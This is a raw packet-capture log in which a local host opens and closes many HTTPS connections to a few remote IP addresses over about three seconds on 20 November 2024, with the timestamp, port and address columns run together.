                                                                                                                                                                                                Nov 20, 2024 10:54:45.759301901 CET49889443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.759309053 CET4434988913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.764524937 CET4434989013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.764940023 CET49890443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.764974117 CET4434989013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.765342951 CET49890443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.765348911 CET4434989013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.794102907 CET4434989113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.794457912 CET4434989213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.794620037 CET49891443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.794646025 CET4434989113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.794759989 CET49892443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.794785023 CET4434989213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.795063019 CET49891443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.795068026 CET4434989113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.795332909 CET49892443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.795340061 CET4434989213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.833013058 CET4434989313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.833525896 CET49893443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.833565950 CET4434989313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.833983898 CET49893443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.833993912 CET4434989313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.866323948 CET4434989013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.866504908 CET4434989013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.866517067 CET4434988913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.866662025 CET49890443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.866755009 CET49890443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.866780043 CET4434989013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.866791964 CET49890443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.866797924 CET4434989013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.866966009 CET4434988913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.867022038 CET4434988913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.867069960 CET49889443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.867100954 CET49889443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.868721008 CET49889443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.868745089 CET4434988913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.874238014 CET49895443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.874279976 CET4434989513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.874494076 CET49895443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.874985933 CET49895443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.875005960 CET4434989513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.876601934 CET49896443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.876653910 CET4434989613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.877007008 CET49896443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.877779007 CET49896443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.877795935 CET4434989613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.900461912 CET4434989213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.900636911 CET4434989213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.900728941 CET49892443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.900769949 CET49892443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.900769949 CET49892443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.900790930 CET4434989213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.900801897 CET4434989213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.901760101 CET4434989113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.902266026 CET4434989113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.902323961 CET4434989113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.902370930 CET49891443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.902371883 CET49891443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.902475119 CET49891443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.902497053 CET4434989113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.902502060 CET49891443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.902507067 CET4434989113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.903680086 CET49897443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.903717995 CET4434989713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.903906107 CET49897443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.904079914 CET49897443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.904105902 CET4434989713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.905096054 CET49898443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.905138969 CET4434989813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.905390024 CET49898443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.905577898 CET49898443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.905591011 CET4434989813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.936979055 CET4434989313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.937171936 CET4434989313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.937233925 CET49893443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.937299013 CET49893443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.937314987 CET4434989313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.937320948 CET49893443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.937325954 CET4434989313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.940493107 CET49899443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.940521002 CET4434989913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.940715075 CET49899443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.940881968 CET49899443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:45.940896988 CET4434989913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.531021118 CET4434989613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.531080008 CET4434989513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.546123981 CET4434989713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.553824902 CET4434989813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.582484961 CET49895443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.583259106 CET49896443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.596219063 CET49897443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.601824045 CET49898443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.604296923 CET4434989913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.635519028 CET49899443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.635556936 CET4434989913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.636149883 CET49899443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.636157990 CET4434989913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.636262894 CET49895443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.636269093 CET4434989513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.636487961 CET49896443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.636498928 CET4434989613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.636775970 CET49895443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.636780024 CET4434989513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.636924028 CET49896443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.636930943 CET4434989613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.637182951 CET49897443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.637192011 CET4434989713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.637319088 CET49898443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.637325048 CET4434989813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.637583971 CET49897443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.637590885 CET4434989713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.637713909 CET49898443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.637720108 CET4434989813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.732073069 CET4434989513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.732117891 CET4434989613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.732322931 CET4434989513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.732382059 CET49895443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.732597113 CET4434989613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.732667923 CET49896443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.732728004 CET49895443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.732728004 CET49895443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.732745886 CET4434989513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.732755899 CET4434989513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.733153105 CET4434989713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.733227968 CET4434989713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.733285904 CET49897443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.733922005 CET4434989913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.733972073 CET4434989913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.734004021 CET49896443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.734024048 CET4434989613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.734038115 CET49896443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.734040976 CET49899443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.734061003 CET4434989613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.734734058 CET4434989813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.734823942 CET4434989813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.734879017 CET4434989813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.734937906 CET49898443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.735636950 CET49898443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.735652924 CET4434989813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.735663891 CET49898443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.735667944 CET4434989813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.736044884 CET49897443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.736058950 CET4434989713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.736079931 CET49897443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.736087084 CET4434989713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.736933947 CET49899443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.736943007 CET4434989913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.736954927 CET49899443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.736959934 CET4434989913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.739451885 CET49902443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.739486933 CET4434990213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.739599943 CET49902443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.740860939 CET49903443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.740905046 CET4434990313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.740992069 CET49903443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.741605997 CET49902443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.741621017 CET4434990213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.741906881 CET49904443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.741930962 CET4434990413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.741982937 CET49904443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.742093086 CET49904443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.742110014 CET4434990413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.742189884 CET49903443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.742225885 CET4434990313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.743236065 CET49905443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.743262053 CET4434990513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.743433952 CET49905443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.743552923 CET49905443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.743570089 CET4434990513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.743585110 CET49906443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.743602037 CET4434990613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:46.743664026 CET49906443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.743762970 CET49906443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:46.743777990 CET4434990613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.382369041 CET4434990313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.382884979 CET49903443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.382900000 CET4434990313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.383359909 CET49903443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.383363008 CET4434990313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.383532047 CET4434990513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.383541107 CET4434990213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.383929014 CET49905443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.383953094 CET4434990513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.384196043 CET4434990613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.384215117 CET49902443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.384232044 CET4434990213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.384279013 CET49905443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.384284973 CET4434990513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.384612083 CET49906443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.384629011 CET4434990613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.384670019 CET49902443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.384675980 CET4434990213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.385087013 CET49906443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.385093927 CET4434990613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.388154984 CET4434990413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.388535023 CET49904443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.388552904 CET4434990413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.388907909 CET49904443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.388912916 CET4434990413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.484046936 CET4434990313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.484118938 CET4434990313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.484232903 CET4434990313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.484309912 CET49903443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.484419107 CET49903443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.484419107 CET49903443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.484460115 CET4434990313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.484487057 CET4434990313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.485066891 CET4434990513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.485346079 CET4434990513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.485403061 CET49905443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.486504078 CET49905443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.486504078 CET49905443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.486519098 CET4434990513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.486529112 CET4434990513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.486915112 CET4434990213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.487270117 CET4434990213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.487333059 CET49902443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.487474918 CET49902443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.487474918 CET49902443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.487492085 CET4434990213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.487502098 CET4434990213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.489914894 CET49908443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.489969015 CET4434990813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.490025043 CET49908443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.490375042 CET49908443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.490406990 CET4434990813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.490710974 CET49909443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.490737915 CET4434990913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.490901947 CET49910443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.490915060 CET4434991013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.490937948 CET49909443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.490977049 CET49910443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491126060 CET49909443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491142035 CET4434990913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491163015 CET49910443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491173029 CET4434991013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491266966 CET4434990613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491384029 CET4434990613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491421938 CET4434990613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491439104 CET49906443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491476059 CET49906443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491511106 CET49906443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491523027 CET4434990613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491533041 CET49906443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.491538048 CET4434990613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493134022 CET4434990413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493422985 CET4434990413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493470907 CET4434990413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493483067 CET49904443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493520975 CET49904443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493560076 CET49904443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493565083 CET4434990413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493575096 CET49904443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493577957 CET4434990413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493732929 CET49911443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493746042 CET4434991113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493875980 CET49911443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493947029 CET49911443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.493956089 CET4434991113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.495495081 CET49912443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.495532036 CET4434991213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.495786905 CET49912443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.495917082 CET49912443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:47.495932102 CET4434991213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.889384031 CET49913443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:54:47.889420986 CET44349913142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.889493942 CET49913443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:54:47.889713049 CET49913443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:54:47.889730930 CET44349913142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.106338978 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.106352091 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.106498957 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.106790066 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.106803894 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.107264042 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.107285976 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.107417107 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.107594967 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.107606888 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.130814075 CET4434991013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.131442070 CET4434991113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.134243965 CET4434991213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.136732101 CET4434990913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.139219999 CET4434990813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.173964024 CET49910443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.173983097 CET49911443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.176520109 CET49908443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.176532984 CET4434990813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.177651882 CET49908443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.177656889 CET4434990813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.178536892 CET49910443192.168.2.713.107.246.45
